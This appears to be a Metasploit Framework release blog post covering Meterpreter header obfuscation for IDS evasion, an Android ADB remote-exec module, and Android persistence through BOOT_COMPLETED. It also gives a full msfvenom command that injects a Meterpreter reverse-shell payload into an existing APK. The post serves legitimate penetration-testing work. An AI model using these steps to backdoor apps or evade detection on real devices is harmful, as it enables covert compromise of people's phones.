A little entropy goes a long way

Meterpreter can communicate via straight TCP or over HTTP(S), but whatever the transport, the protocol is pretty much the same. It uses what is called a TLV protocol, for Type-Length-Value. In truth, meterpreter actually does it in a different order: Length, Type, Value. Each meterpreter packet is a collection of TLVs and is itself a TLV. That makes it so you can skip over a type or even a whole packet without having to know how to parse it, but that doesn't really matter. What's important for us when talking about what this looks like on the wire is that each packet's method is a recognizable string in the header. That in turn makes it easier for IDS/IPS to get angry with our packets. And we don't like making them angry. As of this week, that recognizable string is no longer recognizable. Instead, it's xor'd with a random value so no two packet headers are alike (probablistically).

More Android fun

Debugging like a boss

ADB is a debugging tool for android that you can enable by turning on the phone's developer mode. It can run as a TCP server, much like GDB server does, and convincing a debugger to run code for you is pretty straight forward, since that's kinda what it's for. Typically, remote debuggers aren't exposed to real networks, but you never know. Where this is more likely to show up is on a developer's machine, where the adb service is used to communicate with a local emulator or a device connected via USB. Now with exploit/android/adb/adb_server_exec, you can upload a native payload to those devices for fun and profit.

Backdoor all the things

For a longer term solution, you might want to take advantage of the new ability in msfvenom to use an existing APK as a template. First, you'll need a couple of external tools -- jarsigner from any ol' java sdk and apktool. Once those are squared away, you can take something like Facebook's APK and inject a Meterpreter payload on top of it:

msfvenom -x foo.apk -p android/meterpreter/reverse_tcp LHOST=8.8.8.8 -o bar.apk

Bad intentions, or Badass intentions?

Intents are neat. They're basically a way to tell an android device, "run whatever app is registered to handle this thing." One of the most common is android.intent.action.VIEW, which handles images and web pages and such. There's now a new command called activity_start that lets you manually invoke arbitrary intents. So once you've got that Meterpreter session, you can do this

activity_start intent://youtube.com/watch?v=dQw4w9WgXcQ&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end

and have everyone's favorite song play on youtube. There's another one called BOOT_COMPLETED that lets you register a thing to run when the phone is finished booting; basically built-in persistence. We've had this one enabled for a while now, but we haven't mentioned it here yet: as long as you install the APK and run it once, the device will kindly restart it everytime it comes back on.

New Modules

Exploit modules (2 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.7...4.11.10